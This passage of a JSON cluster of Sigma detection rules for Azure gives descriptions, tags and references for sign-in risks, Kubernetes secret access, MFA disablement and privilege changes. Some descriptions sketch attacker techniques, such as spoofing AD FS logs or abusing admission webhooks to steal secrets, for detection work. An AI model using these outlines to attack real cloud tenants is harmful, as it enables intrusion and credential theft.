flagged by this detection in the context of other sign-ins from the user." ], "filename": "azure_identity_protection_suspicious_browser.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-browser", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_suspicious_browser.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "944f6adb-7a99-4c69-80c1-b712579e93e6", "value": "Suspicious Browser Activity" }, { "description": "Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "A legitimate forwarding rule." ], "filename": "azure_identity_protection_inbox_forwarding_rule.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-forwarding", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_forwarding_rule.yml" ], "tags": [ "attack.t1140", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "27e4f1d6-ae72-4ea0-8a67-77a73a289c3d", "value": "Suspicious Inbox Forwarding Identity Protection" }, { "description": "Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "User changing to a new device, location, browser, etc." ], "filename": "azure_identity_protection_unfamilar_sign_in.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_unfamilar_sign_in.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "128faeef-79dd-44ca-b43c-a9e236a60f49", "value": "Unfamiliar Sign-In Properties" }, { "description": "Indicates user activity that is unusual for the user or consistent with known attack patterns.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-07", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], "filename": "azure_identity_protection_threat_intel.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in", "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_threat_intel.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2cb56ff-4f46-437a-a0fa-ffa4d1303cba", "value": "Azure AD Threat Intelligence" }, { "description": "Indicates that the user's valid credentials have been leaked.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "A rare hash collision." ], "filename": "azure_identity_protection_leaked_credentials.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#leaked-credentials", "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_leaked_credentials.yml" ], "tags": [ "attack.t1589", "attack.reconnaissance" ] }, "related": [ { "dest-uuid": "5282dd9a-d26d-4e16-88b7-7c0f4553daf4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "19128e5e-4743-48dc-bd97-52e5775af817", "value": "Azure AD Account Credential Leaked" }, { "description": "Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "Using an IP address that is shared by many users" ], "filename": "azure_identity_protection_malware_linked_ip.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated", "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml" ], "tags": [ "attack.t1090", "attack.command-and-control" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "821b4dc3-1295-41e7-b157-39ab212dd6bd", "value": "Sign-In From Malware Infected IP" }, { "description": "Detects suspicious rules that delete or move messages or folders are set on a user's inbox.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "Actual mailbox rules that are moving items based on their workflow." ], "filename": "azure_identity_protection_inbox_manipulation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml" ], "tags": [ "attack.t1140", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ceb55fd0-726e-4656-bf4e-b585b7f7d572", "value": "Suspicious Inbox Manipulation Rules" }, { "description": "Indicates that a password spray attack has been successfully performed.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], "filename": "azure_identity_protection_password_spray.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_password_spray.yml" ], "tags": [ "attack.t1110", "attack.credential-access" ] }, "related": [ { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28ecba0a-c743-4690-ad29-9a8f6f25a6f9", "value": "Password Spray Activity" }, { "description": "Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.", "meta": { "author": "Gloria Lee, '@gleeiamglo'", "creation_date": "2023-08-22", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins" ], "filename": "azure_identity_protection_anonymous_ip_address.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anonymous-ip-address", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anonymous_ip_address.yml" ], "tags": [ "attack.t1528", "attack.credential-access" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53acd925-2003-440d-a1f3-71a5253fe237", "value": "Anonymous IP Address" }, { "description": "Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.", "meta": { "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", "creation_date": "2023-09-03", "falsepositive": [ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." ], "filename": "azure_identity_protection_atypical_travel.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins", "https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml" ], "tags": [ "attack.t1078", "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.initial-access" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a41023f-1e70-4026-921a-4d9341a9038e", "value": "Atypical Travel" }, { "description": "Identifies the deletion of Azure Kubernetes Pods.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_kubernetes_pods_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_pods_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "b02f9591-12c3-4965-986a-88028629b2e1", "value": "Azure Kubernetes Pods Deleted" }, { "description": "Detects when a Container Registry is created or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_container_registry_created_or_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_container_registry_created_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "93e0ef48-37c8-49ed-a02c-038aab23628e", "value": "Azure Container Registry Created or Deleted" }, { "description": "Identifies when a service principal is created in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-02", "falsepositive": [ "Service principal being created may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_service_principal_created.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_service_principal_created.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "0ddcff6d-d262-40b0-804b-80eb592de8e3", "value": "Azure Service Principal Created" }, { "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_kubernetes_role_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_role_access.yml" ], "tags": [ "attack.impact" ] }, "uuid": "818fee0c-e0ec-4e45-824e-83e4817b0887", "value": "Azure Kubernetes Sensitive Role Access" }, { "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-07", "falsepositive": [ "Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_kubernetes_secret_or_config_object_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_kubernetes_secret_or_config_object_access.yml" ], "tags": [ "attack.impact" ] }, "uuid": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", "value": "Azure Kubernetes Secret or Config Object Access" }, { "description": "Identifies when secrets are modified or deleted in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-16", "falsepositive": [ "Secrets being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_keyvault_secrets_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_keyvault_secrets_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.credential-access", "attack.t1552", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", "value": "Azure Keyvault Secrets Modified or Deleted" }, { "description": "Identifies when a application is deleted in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-03", "falsepositive": [ "Application being deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_application_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_application_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", "value": "Azure Application Deleted" }, { "description": "Identifies when a owner is was removed from a application or service principal in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-03", "falsepositive": [ "Owner being removed may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_owner_removed_from_application_or_service_principal.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_owner_removed_from_application_or_service_principal.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", "value": "Azure Owner Removed From Application or Service Principal" }, { "description": "Identifies when a device or device configuration in azure is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-03", "falsepositive": [ "Device or device configuration being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_device_or_configuration_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_device_or_configuration_modified_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1485", "attack.t1565.001" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", "value": "Azure Device or Configuration Modified or Deleted" }, { "description": "Identifies when a service principal was removed in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-09-03", "falsepositive": [ "Service principal being removed may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_service_principal_removed.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_service_principal_removed.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "448fd1ea-2116-4c62-9cde-a92d120e0f08", "value": "Azure Service Principal Removed" }, { "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-26", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_subscription_permissions_elevation_via_activitylogs.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_subscription_permissions_elevation_via_activitylogs.yml" ], "tags": [ "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", "value": "Azure Subscription Permission Elevation Via ActivityLogs" }, { "description": "Identifies when a Virtual Network is modified or deleted in Azure.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_virtual_network_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_virtual_network_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", "value": "Azure Virtual Network Modified or Deleted" }, { "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_network_firewall_rule_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_network_firewall_rule_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", "value": "Azure Firewall Rule Configuration Modified or Deleted" }, { "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-08-26", "falsepositive": [ "Legitimate AD FS servers added to an AAD Health AD FS service instance" ], "filename": "azure_aadhybridhealth_adfs_new_server.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://o365blog.com/post/hybridhealthagent/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_new_server.yml" ], "tags": [ "attack.defense-evasion", "attack.t1578" ] }, "related": [ { "dest-uuid": "144e007b-e638-431d-a894-45d90c54ab90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", "value": "Azure Active Directory Hybrid Health AD FS New Server" }, { "description": "Identifies when a VPN connection is modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-08", "falsepositive": [ "VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_vpn_connection_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_vpn_connection_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", "value": "Azure VPN Connection Modified or Deleted" }, { "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", "meta": { "author": "sawwinnnaung", "creation_date": "2020-05-07", "falsepositive": [ "Valid change" ], "filename": "azure_rare_operations.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_rare_operations.yml" ], "tags": [ "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c1182e02-49a3-481c-b3de-0fadc4091488", "value": "Rare Subscription-level Operations In Azure" }, { "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.", "meta": { "author": "@ionsor", "creation_date": "2022-02-08", "falsepositive": [ "Authorized modification by administrators" ], "filename": "azure_mfa_disabled.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_mfa_disabled.yml" ], "tags": [ "attack.persistence", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", "value": "Disabled MFA to Bypass Authentication Mechanisms" }, { "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", "meta": { "author": "sawwinnnaung", "creation_date": "2020-05-07", "falsepositive": [ "Valid change" ], "filename": "azure_granting_permission_detection.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_granting_permission_detection.yml" ], "tags": [ "attack.persistence", "attack.t1098.003" ] }, "related": [ { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", "value": "Granting Of Permissions To An Account" }, { "description": "User Added to an Administrator's Azure AD Role", "meta": { "author": "Raphaël CALVET, @MetallicHack", "creation_date": "2021-10-04", "falsepositive": [ "PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled." ], "filename": "azure_ad_user_added_to_admin_role.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_ad_user_added_to_admin_role.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1098.003", "attack.t1078" ] }, "related": [ { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", "value": "User Added to an Administrator's Azure AD Role" }, { "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-25", "falsepositive": [ "Azure Kubernetes Admissions Controller may be done by a system administrator.", "If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_kubernetes_admission_controller.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": 